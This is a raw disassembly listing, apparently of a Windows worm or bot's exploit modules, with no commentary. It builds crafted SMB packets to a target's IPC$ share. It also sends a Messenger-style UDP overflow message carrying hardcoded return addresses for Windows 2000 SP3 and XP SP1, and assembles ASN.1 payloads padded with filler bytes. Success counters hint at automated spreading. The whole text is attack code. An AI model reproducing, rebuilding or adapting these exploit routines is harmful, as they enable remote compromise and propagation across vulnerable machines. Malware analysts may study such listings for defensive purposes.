loc_40DDD4: ; CODE XREF: seg000:0040DD42�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDD9 proc near ; CODE XREF: seg000:0040E332�p
; seg000:0040E354�p ...
var_89B8 = byte ptr -89B8h
var_8950 = byte ptr -8950h
var_68E0 = byte ptr -68E0h
var_6870 = byte ptr -6870h
var_5DAC = byte ptr -5DACh
var_4808 = byte ptr -4808h
var_4807 = byte ptr -4807h
var_3774 = byte ptr -3774h
var_2CB0 = byte ptr -2CB0h
var_2CAF = byte ptr -2CAFh
var_2CAC = byte ptr -2CACh
var_24C8 = byte ptr -24C8h
var_24B8 = byte ptr -24B8h
var_2194 = byte ptr -2194h
var_2190 = byte ptr -2190h
var_2184 = byte ptr -2184h
var_1EFC = byte ptr -1EFCh
var_1E80 = byte ptr -1E80h
var_16B0 = byte ptr -16B0h
var_1205 = byte ptr -1205h
var_F18 = byte ptr -0F18h
var_E78 = byte ptr -0E78h
var_76C = dword ptr -76Ch
var_75C = byte ptr -75Ch
var_748 = byte ptr -748h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_B8 = byte ptr -0B8h
var_B5 = byte ptr -0B5h
var_8B = byte ptr -8Bh
var_89 = byte ptr -89h
var_88 = byte ptr -88h
var_40 = byte ptr -40h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B8h
call sub_41EA20
mov eax, ds:dword_432F94
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_432F98
push esi
mov [ebp+var_C], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_40]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_41E6A6
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40DE12: ; CODE XREF: sub_40DDD9+4F�j
mov cl, [ebp+eax+var_40]
mov [ebp+eax*2+var_108], cl
mov [ebp+eax*2+var_107], bl
inc eax
cmp eax, 28h
jl short loc_40DE12
push 60h
lea eax, [ebp+var_B8]
push offset dword_43EFF8
push eax
call sub_41F400
lea eax, [ebp+var_40]
push eax
call sub_41E1C0
shl eax, 1
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_88]
push eax
call sub_41F400
add esp, 1Ch
push 9
lea eax, [ebp+var_40]
push (offset aC_4+3)
push eax
call sub_41E1C0
pop ecx
lea eax, [ebp+eax*2+var_89]
push eax
call sub_41F400
lea eax, [ebp+var_40]
push eax
call sub_41E1C0
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
push 1
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B5]
push eax
call sub_41F400
lea eax, [ebp+var_40]
push eax
call sub_41E1C0
shl al, 1
add al, 9
mov [ebp+var_2], al
push 1
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_8B]
push eax
call sub_41F400
xor eax, eax
mov ax, word ptr ds:dword_4D525C
add esp, 2Ch
push eax
call ds:dword_444260 ; htons
push [ebp+arg_0]
xor eax, 9999h
mov [ebp+var_18], eax
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
xor eax, 99999999h
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_18]
push eax
push offset word_43EB76
call sub_41F400
push 4
lea eax, [ebp+var_8]
push eax
push offset byte_43EB6F
call sub_41F400
add esp, 18h
cmp [ebp+arg_C0], ebx
jz loc_40E001
mov edi, 0DACh
push edi
lea eax, [ebp+var_2CAC]
push 90h
push eax
call sub_41E5F0
mov eax, [ebp+arg_C0]
imul eax, 3Ch
lea eax, dword_43F440[eax]
push 4
push eax
mov [ebp+var_14], eax
lea eax, [ebp+var_24C8]
push eax
call sub_41F400
mov esi, offset dword_43EB00
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_24B8]
push esi
push eax
call sub_41F400
push 4
lea eax, [ebp+var_2194]
push offset dword_432F80
push eax
call sub_41F400
push 4
push [ebp+var_14]
lea eax, [ebp+var_2190]
push eax
call sub_41F400
add esp, 40h
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_2184]
push esi
push eax
call sub_41F400
add esp, 10h
xor eax, eax
loc_40DFB3: ; CODE XREF: sub_40DDD9+1F2�j
mov cl, [ebp+eax+var_2CAC]
mov [ebp+eax*2+var_4808], cl
mov [ebp+eax*2+var_4807], bl
inc eax
cmp eax, edi
jl short loc_40DFB3
mov esi, 1C52h
push esi
lea eax, [ebp+var_89B8]
push 31h
push eax
mov [ebp+var_2CB0], bl
mov [ebp+var_2CAF], bl
call sub_41E5F0
push esi
lea eax, [ebp+var_68E0]
push 31h
push eax
call sub_41E5F0
add esp, 18h
jmp short loc_40E058
; ---------------------------------------------------------------------------
loc_40E001: ; CODE XREF: sub_40DDD9+143�j
push 7D0h
lea eax, [ebp+var_F18]
push 90h
push eax
call sub_41E5F0
mov esi, offset dword_43EB00
push esi
call sub_41E1C0
push eax
lea eax, [ebp+var_E78]
push esi
push eax
call sub_41F400
lea eax, [ebp+var_10]
push eax
call sub_41E1C0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_75C]
push eax
call sub_41F400
mov eax, ds:dword_43F440
add esp, 2Ch
mov [ebp+var_76C], eax
loc_40E058: ; CODE XREF: sub_40DDD9+226�j
push 0E29h
lea eax, [ebp+var_1EFC]
push 31h
push eax
call sub_41E5F0
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
push ebx
add eax, 4
push eax
lea eax, [ebp+var_B8]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
mov esi, 640h
push esi
lea eax, [ebp+var_748]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 68h
push offset dword_43F060
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 0A0h
push offset dword_43F0D0
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call ds:dword_444064 ; recv
cmp [ebp+arg_C0], ebx
jz loc_40E1B2
push 68h
lea eax, [ebp+var_89B8]
push offset dword_43F290
push eax
call sub_41F400
push 1B5Ah
lea eax, [ebp+var_4808]
push eax
lea eax, [ebp+var_8950]
push eax
call sub_41F400
push 70h
lea eax, [ebp+var_68E0]
push offset dword_43F300
push eax
call sub_41F400
push 0A5Eh
lea eax, [ebp+var_3774]
push eax
lea eax, [ebp+var_6870]
push eax
call sub_41F400
push 84h
lea eax, [ebp+var_5DAC]
push offset dword_43F378
push eax
call sub_41F400
add esp, 3Ch
push ebx
push 10FCh
lea eax, [ebp+var_89B8]
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call ds:dword_444064 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68E0]
jmp short loc_40E208
; ---------------------------------------------------------------------------
loc_40E1B2: ; CODE XREF: sub_40DDD9+329�j
push 7Ch
lea eax, [ebp+var_1EFC]
push offset dword_43F178
push eax
call sub_41F400
push 7D0h
lea eax, [ebp+var_F18]
push eax
lea eax, [ebp+var_1E80]
push eax
call sub_41F400
push 90h
lea eax, [ebp+var_16B0]
push offset off_43F1F8
push eax
call sub_41F400
add esp, 24h
push ebx
mov [ebp+var_1205], bl
push 0CF8h
lea eax, [ebp+var_1EFC]
loc_40E208: ; CODE XREF: sub_40DDD9+3D7�j
push eax
push edi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E219
loc_40E215: ; CODE XREF: sub_40DDD9+2B5�j
; sub_40DDD9+2E2�j ...
xor al, al
jmp short loc_40E21B
; ---------------------------------------------------------------------------
loc_40E219: ; CODE XREF: sub_40DDD9+43A�j
mov al, 1
loc_40E21B: ; CODE XREF: sub_40DDD9+43E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DDD9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 654h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-14h], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call ds:dword_444260 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call ds:dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E319
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E319
push edi
push 89h
push offset dword_43EDD8
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
mov esi, 640h
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
push edi
push 0A8h
push offset dword_43EE68
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
push edi
push 0DEh
push offset dword_43EF18
push ebx
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call ds:dword_444064 ; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40E341
dec eax
jz short loc_40E320
loc_40E319: ; CODE XREF: seg000:0040E274�j
; seg000:0040E28A�j ...
xor eax, eax
jmp loc_40E3AD
; ---------------------------------------------------------------------------
loc_40E320: ; CODE XREF: seg000:0040E317�j
push edi
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
push 0
jmp short loc_40E365
; ---------------------------------------------------------------------------
loc_40E341: ; CODE XREF: seg000:0040E314�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
test al, al
jnz short loc_40E385
push 1
loc_40E365: ; CODE XREF: seg000:0040E33F�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
test al, al
jz short loc_40E38C
loc_40E385: ; CODE XREF: seg000:0040E361�j
mov dword ptr [ebp-4], 1
loc_40E38C: ; CODE XREF: seg000:0040E383�j
push ebx
call ds:dword_444218 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40E3AA
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
loc_40E3AA: ; CODE XREF: seg000:0040E397�j
xor eax, eax
inc eax
loc_40E3AD: ; CODE XREF: seg000:0040E31B�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E3B2 proc near ; CODE XREF: seg000:0040E670�p
var_13DC = byte ptr -13DCh
var_13CC = byte ptr -13CCh
var_11E8 = byte ptr -11E8h
var_AE4 = byte ptr -0AE4h
var_68E = byte ptr -68Eh
var_683 = dword ptr -683h
var_67F = dword ptr -67Fh
var_67B = byte ptr -67Bh
var_551 = byte ptr -551h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_24 = byte ptr -24h
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 13DCh
call sub_41EA20
push ebx
push esi
push edi
mov esi, offset dword_433008
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
mov esi, offset aNetmaniac ; "NETMANIAC"
lea edi, [ebp+var_24]
movsd
movsd
movsw
mov esi, offset aAdik ; "ADIK"
lea edi, [ebp+var_18]
movsd
movsb
push 7
pop ecx
mov esi, offset dword_432FD4
lea edi, [ebp+var_54]
rep movsd
movsw
movsb
mov esi, offset dword_432FC4
lea edi, [ebp+var_34]
movsd
movsd
push [ebp+arg_4]
movsd
movsb
mov esi, offset aMessage ; "*** MESSAGE ***"
lea edi, [ebp+var_13DC]
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_0]
xor eax, eax
push eax
mov ecx, 4DEh
lea edi, [ebp+var_13CC]
push esi
rep stosd
call sub_41E5F0
push 50h
push offset dword_43F6E0
push esi
call sub_41F400
lea eax, [ebp+var_24]
push eax
call sub_41E1C0
mov edi, eax
push 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [esi+50h]
inc edi
push eax
mov [ebp+var_10], edi
mov [ebp+var_8], edi
call sub_41F400
lea eax, [ebp+var_24]
push eax
lea eax, [esi+5Ch]
push eax
call sub_41EEC0
dec edi
lea eax, [ebp+var_18]
and edi, 0FFFFFFFCh
push eax
add edi, 60h
call sub_41E1C0
mov ebx, eax
inc ebx
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
push 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [edi+esi]
push eax
call sub_41F400
add esp, 40h
lea eax, [ebp+var_18]
push eax
add edi, 0Ch
lea eax, [edi+esi]
push eax
call sub_41EEC0
push 8F8h
dec ebx
lea eax, [ebp+var_13DC]
push 90h
and ebx, 0FFFFFFFCh
push eax
lea edi, [edi+ebx+4]
call sub_41E5F0
push 1E4h
lea eax, [ebp+var_11E8]
push offset dword_43F4F8
push eax
call sub_41F400
push 708h
lea eax, [ebp+var_AE4]
push 14h
push eax
call sub_41E5F0
push 0Dh
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_68E]
push eax
call sub_41F400
mov eax, [ebp+arg_8]
mov [ebp+var_683], eax
mov eax, [ebp+arg_C]
mov [ebp+var_67F], eax
push 1Eh
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_67B]
push eax
call sub_41F400
add esp, 44h
mov eax, 0E8Ch
sub eax, edi
push eax
push offset aMsgBodySizeD ; "[*] Msg body size: %d\n"
push offset dword_443520
call sub_41ECA2
lea eax, [ebp+var_551]
sub eax, edi
mov byte ptr [eax], 0
lea eax, [ebp+var_13DC]
push eax
call sub_41E1C0
mov ebx, eax
push 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [edi+esi]
inc ebx
push eax
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
call sub_41F400
lea eax, [ebp+var_13DC]
push eax
add edi, 0Ch
lea eax, [edi+esi]
push eax
call sub_41EEC0
push 0
add edi, ebx
call sub_41F87E
mov [esi+28h], eax
add esp, 28h
lea eax, [edi-50h]
mov [esi+4Ah], eax
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40E3B2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2064h
call sub_41EA20
push ebx
push esi
push edi
push 5
pop ecx
mov esi, offset aWindows2000Sp3 ; "Windows 2000 SP 3 (en)"
lea edi, [ebp-64h]
rep movsd
movsw
movsb
xor eax, eax
lea edi, [ebp-4Dh]
stosd
stosw
stosb
push 5
mov dword ptr [ebp-44h], 77EE044Ch
mov dword ptr [ebp-40h], 768D693Eh
pop ecx
mov esi, offset aWindowsXpSp1En ; "Windows XP SP 1 (en)"
lea edi, [ebp-3Ch]
rep movsd
movsb
xor eax, eax
lea edi, [ebp-27h]
stosd
stosd
stosb
lea eax, [ebp+0Ch]
push 1
push eax
mov dword ptr [ebp-1Ch], 77ED73B4h
mov dword ptr [ebp-18h], 7804BF52h
call sub_41AA0A
cmp eax, 1
pop ecx
pop ecx
jz loc_40E6F3
test eax, eax
jz loc_40E6F3
push 2
pop edi
cmp eax, edi
jnz short loc_40E61A
xor esi, esi
jmp short loc_40E61D
; ---------------------------------------------------------------------------
loc_40E61A: ; CODE XREF: seg000:0040E614�j
mov esi, [ebp-14h]
loc_40E61D: ; CODE XREF: seg000:0040E618�j
cmp eax, 3
jnz short loc_40E625
xor esi, esi
inc esi
loc_40E625: ; CODE XREF: seg000:0040E620�j
push 10h
lea eax, [ebp-10h]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov [ebp-10h], di
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call ds:dword_444260 ; htons
mov [ebp-0Eh], ax
lea eax, [esi+esi*4]
shl eax, 3
push dword ptr [ebp+eax-44h]
push dword ptr [ebp+eax-40h]
lea eax, [ebp-2064h]
push 2000h
push eax
call sub_40E3B2
add esp, 10h
push 11h
push edi
push edi
mov ebx, eax
call ds:dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40E6F3
push 10h
lea eax, [ebp-10h]
push eax
push 0
push ebx
lea eax, [ebp-2064h]
push eax
push esi
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_40E6F3
push esi
call ds:dword_444218 ; closesocket
push 1F4h
call ds:dword_42B014 ; Sleep
push 23E7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_40E6F3
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40E6F5
; ---------------------------------------------------------------------------
loc_40E6F3: ; CODE XREF: seg000:0040E601�j
; seg000:0040E609�j ...
xor eax, eax
loc_40E6F5: ; CODE XREF: seg000:0040E6F1�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40E6FA proc near ; CODE XREF: sub_40F1FF+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movsx eax, [esp+arg_8]
push [esp+arg_4]
push eax
push [esp+8+arg_0]
call sub_41E5F0
add esp, 0Ch
retn
sub_40E6FA endp
; =============== S U B R O U T I N E =======================================
sub_40E711 proc near ; CODE XREF: sub_40E971+116�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_41E5D3
mov edi, eax
test edi, edi
pop ecx
jz short loc_40E743
push ebx
push 0
push edi
call sub_41E5F0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_41F400
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40E743: ; CODE XREF: sub_40E711+14�j
pop edi
mov eax, esi
pop esi
pop ebx
retn 8
sub_40E711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E74B proc near ; CODE XREF: sub_40E841+19�p
; sub_40E8B5+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
mov ebx, ecx
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_41E5D3
mov esi, eax
test esi, esi
pop ecx
jz short loc_40E797
push edi
push 0
push esi
call sub_41E5F0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_41F400
push [ebp+arg_C]
mov eax, [ebp+arg_4]
push [ebp+arg_8]
add eax, esi
push eax
call sub_41F400
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40E797: ; CODE XREF: sub_40E74B+1C�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 10h
sub_40E74B endp
; =============== S U B R O U T I N E =======================================
sub_40E7A0 proc near ; CODE XREF: sub_40E841+5B�p
; sub_40E841+68�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40E7B0
push eax
call sub_41E2A1
pop ecx
loc_40E7B0: ; CODE XREF: sub_40E7A0+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40E7A0 endp
; =============== S U B R O U T I N E =======================================
sub_40E7B9 proc near ; CODE XREF: sub_40E841+21�p
; sub_40E916+8�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
cmp eax, 0FFFFh
jl short loc_40E7CA
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E7CA: ; CODE XREF: sub_40E7B9+B�j
push ebx
xor ebx, ebx
cmp eax, 7Fh
setnl bl
push edi
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_41E5D3
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40E7EB
xor al, al
jmp short loc_40E83D
; ---------------------------------------------------------------------------
loc_40E7EB: ; CODE XREF: sub_40E7B9+2C�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_41E5F0
add esp, 0Ch
cmp ebx, 1
jnz short loc_40E80B
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_40E820
; ---------------------------------------------------------------------------
loc_40E80B: ; CODE XREF: sub_40E7B9+46�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_40E820: ; CODE XREF: sub_40E7B9+50�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_41F400
add esp, 0Ch
push dword ptr [esi]
call sub_41E2A1
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40E83D: ; CODE XREF: sub_40E7B9+30�j
pop edi
pop ebx
pop esi
retn
sub_40E7B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E841 proc near ; CODE XREF: sub_40E971+7F�p
; sub_40E971+DB�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, ecx
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_42C814
call sub_40E74B
lea ecx, [ebp+var_8]
call sub_40E7B9
mov ebx, [ebp+var_4]
inc ebx
push ebx
call sub_41E5D3
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40E87C
xor al, al
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E87C: ; CODE XREF: sub_40E841+35�j
push ebx
push 0
push edi
call sub_41E5F0
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
mov byte ptr [edi], 3
push eax
call sub_41F400
add esp, 18h
mov ecx, esi
call sub_40E7A0
lea ecx, [ebp+var_8]
mov [esi+4], ebx
mov [esi], edi
call sub_40E7A0
mov al, 1
loc_40E8B0: ; CODE XREF: sub_40E841+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8B5 proc near ; CODE XREF: sub_40E8E9+14�p
; sub_40E906+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push [ebp+arg_4]
mov esi, ecx
push [ebp+arg_0]
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40E74B
mov ecx, esi
call sub_40E7A0
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40E8B5 endp
; =============== S U B R O U T I N E =======================================
sub_40E8E9 proc near ; CODE XREF: sub_40E971+E8�p
; sub_40E971+153�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_41E1C0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40E8B5
pop esi
retn 4
sub_40E8E9 endp
; =============== S U B R O U T I N E =======================================
sub_40E906 proc near ; CODE XREF: sub_40E952+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40E8B5
retn 8
sub_40E906 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E916 proc near ; CODE XREF: sub_40E952+16�p
; sub_40E971+87�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40E7B9
test al, al
jz short loc_40E94F
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_42FB74
call sub_40E74B
mov ecx, esi
call sub_40E7A0
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40E94F: ; CODE XREF: sub_40E916+F�j
pop esi
leave
retn
sub_40E916 endp
; =============== S U B R O U T I N E =======================================
sub_40E952 proc near ; CODE XREF: sub_40E971+12C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
mov esi, ecx
push [esp+8+arg_0]
call sub_40E906
test al, al
jz short loc_40E96D
mov ecx, esi
call sub_40E916
loc_40E96D: ; CODE XREF: sub_40E952+12�j
pop esi
retn 8
sub_40E952 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E971 proc near ; CODE XREF: seg000:0040F759�p
var_848 = byte ptr -848h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 848h
push ebx
push esi
xor ecx, ecx
xor edx, edx
mov ebx, 408h
xor esi, esi
cmp [ebp+arg_8], ebx
mov [ebp+var_3C], ecx
mov [ebp+var_40], edx
jg loc_40ECC1
mov eax, [ebp+arg_10]
add eax, 8
cmp eax, ebx
ja loc_40ECC1
push edi
push 4
push offset dword_43F74C
lea ecx, [ebp+var_28]
mov [ebp+var_24], esi
mov [ebp+var_28], esi
mov [ebp+var_4], esi
mov [ebp+var_8], esi
mov [ebp+var_34], esi
mov [ebp+var_38], esi
mov [ebp+var_C], esi
mov [ebp+var_10], esi
mov [ebp+var_2C], esi
mov [ebp+var_30], esi
mov [ebp+var_1C], esi
mov [ebp+var_20], esi
mov [ebp+var_14], esi
mov [ebp+var_18], esi
call sub_40E8B5
push 3
push offset dword_43F748
lea ecx, [ebp+var_28]
call sub_40E8B5
lea ecx, [ebp+var_28]
call sub_40E841
lea ecx, [ebp+var_28]
call sub_40E916
mov edi, 800h
push edi
lea eax, [ebp+var_848]
push 42h
push eax
call sub_41E5F0
add esp, 0Ch
push 8
push offset aRbrbrbrb ; "BBBB"
lea ecx, [ebp+var_8]
call sub_40E8B5
push [ebp+arg_10]
lea ecx, [ebp+var_8]
push [ebp+arg_C]
call sub_40E8B5
mov eax, 409h
sub eax, [ebp+var_4]
lea ecx, [ebp+var_8]
push eax
lea eax, [ebp+var_848]
push eax
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E841
push offset dword_43306C
lea ecx, [ebp+var_38]
call sub_40E8E9
lea ecx, [ebp+var_38]
call sub_40E841
push edi
lea eax, [ebp+var_848]
push 44h
push eax
call sub_41E5F0
add esp, 0Ch
push 410h
lea eax, [ebp+var_848]
push eax
lea ecx, [ebp+var_48]
call sub_40E711
lea ecx, [ebp+var_48]
call sub_40E841
push [ebp+var_44]
lea ecx, [ebp+var_38]
push [ebp+var_48]
call sub_40E952
lea ecx, [ebp+var_48]
call sub_40E7A0
push edi
lea eax, [ebp+var_848]
push 43h
push eax
call sub_41E5F0
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_10]
call sub_40E8E9
push 4
push offset dword_43F734
lea ecx, [ebp+var_10]
call sub_40E8B5
push [ebp+arg_8]
lea ecx, [ebp+var_10]
push [ebp+arg_4]
call sub_40E8B5
sub ebx, [ebp+arg_8]
lea eax, [ebp+var_848]
push ebx
push eax
lea ecx, [ebp+var_10]
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E841
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_30]
call sub_40E8B5
push [ebp+var_34]
mov eax, [ebp+var_38]
push eax
lea ecx, [ebp+var_30]
call sub_40E8B5
lea ecx, [ebp+var_30]
call sub_40E916
lea ecx, [ebp+var_10]
call sub_40E7A0
lea ecx, [ebp+var_38]
call sub_40E7A0
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
push [ebp+var_24]
mov eax, [ebp+var_28]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
push [ebp+var_2C]
mov eax, [ebp+var_30]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
lea ecx, [ebp+var_20]
call sub_40E916
